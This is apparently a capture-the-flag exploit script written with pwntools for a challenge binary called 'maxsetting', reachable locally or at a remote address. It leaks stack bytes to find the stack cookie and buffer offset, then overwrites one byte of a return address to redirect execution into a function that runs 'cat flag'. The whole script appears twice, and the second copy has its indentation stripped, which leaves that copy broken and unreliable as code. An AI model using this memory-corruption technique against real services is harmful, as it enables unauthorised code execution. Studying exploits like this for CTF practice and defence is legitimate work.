ManhNDd/exploit-maxsetting.py

## exploit-maxsetting.py
'''
author: Nguyen Duc Manh
email: imdb95@gmail.com
'''
from pwn import *
import sys
import time
if sys.argv[1] == 'local':
    p = process('./maxsetting')
else:
    p = remote('125.235.240.167', 4001)
'''
let's overwrite the return address of read with 0x55555555490E.
    + return address of read: 0xXXXXXXXXXXXXX956
    + address of EzMoney: 0xXXXXXXXXXXXXX90E
=> overwrite the least significant byte with '\x0E' => system(cat flag)
'''
def exploit(retOffset):
    print hex(retOffset)
    p.send(p16(retOffset))
    raw_input('w')
    p.send('\x12')
    p.interactive()

def leak(idx, c):
    p.send(chr(idx))
    time.sleep(0.1)
    p.send(c)
    data = p.recvuntil('\nTry again?\n')
    print [data]
    return data
'''
Sample stack:
0000| 0x7fffffffe3d8 --> 0x55555555496c (<writeANYwhere+75>:	)
0008| 0x7fffffffe3e0 --> 0x7ffff7dd2620 --> 0xfbad2087
0016| 0x7fffffffe3e8 --> 0x7ffff7a7cdbd (test   DWORD PTR [rbx],0x8000)
0024| 0x7fffffffe3f0 --> 0x7fffffffe3f8 --> 0x9a3d590be410e400
0032| 0x7fffffffe3f8 --> 0x9a3d590be410e400
0040| 0x7fffffffe400 --> 0x7fffffffe410 --> 0x555555554a50 (<__libc_csu_init>:	push   r15)
0048| 0x7fffffffe408 --> 0x555555554a3e (<main+34>:	mov    eax,0x0)
0056| 0x7fffffffe410 --> 0x555555554a50 (<__libc_csu_init>:	push   r15)
=> you can recognize cookie with:
    + its random bytes and one byte '\x00'
    + a qword 0x7fXXXXXXYYXX below
=> use a while loop to search for the cookie. u16(chr(i-16)+chr(YY)) should be the offset of buf.
'''
c = '\x00'
i = 0xf8
while i > 0:
    print hex(i)
    data = leak(i, c)
    if '\x7f' not in data and data.count('\x00') < 2:
        i += 8
        p.send('y')
        data = leak(i, c)
        print 'is it cookie (the second last)?'
        uin = raw_input('?')
        print uin
        if 'Y' in uin:
            t2 = ord(data[len('You wrote: \x88')])
            offset = u16(chr(i-16)+chr(t2))
            print hex(offset)
            p.send('y')
            exploit(offset-24)
        i -= 8
    i -= 8
    p.send('y')
	'''
	author: Nguyen Duc Manh
	email: imdb95@gmail.com
	'''
	from pwn import *
	import sys
	import time
	if sys.argv[1] == 'local':
	p = process('./maxsetting')
	else:
	p = remote('125.235.240.167', 4001)
	'''
	let's overwrite the return address of read with 0x55555555490E.
	+ return address of read: 0xXXXXXXXXXXXXX956
	+ address of EzMoney: 0xXXXXXXXXXXXXX90E
	=> overwrite the least significant byte with '\x0E' => system(cat flag)
	'''
	def exploit(retOffset):
	print hex(retOffset)
	p.send(p16(retOffset))
	raw_input('w')
	p.send('\x12')
	p.interactive()

	def leak(idx, c):
	p.send(chr(idx))
	time.sleep(0.1)
	p.send(c)
	data = p.recvuntil('\nTry again?\n')
	print [data]
	return data
	'''
	Sample stack:
	0000\| 0x7fffffffe3d8 --> 0x55555555496c (<writeANYwhere+75>: )
	0008\| 0x7fffffffe3e0 --> 0x7ffff7dd2620 --> 0xfbad2087
	0016\| 0x7fffffffe3e8 --> 0x7ffff7a7cdbd (test DWORD PTR [rbx],0x8000)
	0024\| 0x7fffffffe3f0 --> 0x7fffffffe3f8 --> 0x9a3d590be410e400
	0032\| 0x7fffffffe3f8 --> 0x9a3d590be410e400
	0040\| 0x7fffffffe400 --> 0x7fffffffe410 --> 0x555555554a50 (<__libc_csu_init>: push r15)
	0048\| 0x7fffffffe408 --> 0x555555554a3e (<main+34>: mov eax,0x0)
	0056\| 0x7fffffffe410 --> 0x555555554a50 (<__libc_csu_init>: push r15)
	=> you can recognize cookie with:
	+ its random bytes and one byte '\x00'
	+ a qword 0x7fXXXXXXYYXX below
	=> use a while loop to search for the cookie. u16(chr(i-16)+chr(YY)) should be the offset of buf.
	'''
	c = '\x00'
	i = 0xf8
	while i > 0:
	print hex(i)
	data = leak(i, c)
	if '\x7f' not in data and data.count('\x00') < 2:
	i += 8
	p.send('y')
	data = leak(i, c)
	print 'is it cookie (the second last)?'
	uin = raw_input('?')
	print uin
	if 'Y' in uin:
	t2 = ord(data[len('You wrote: \x88')])
	offset = u16(chr(i-16)+chr(t2))
	print hex(offset)
	p.send('y')
	exploit(offset-24)
	i -= 8
	i -= 8
	p.send('y')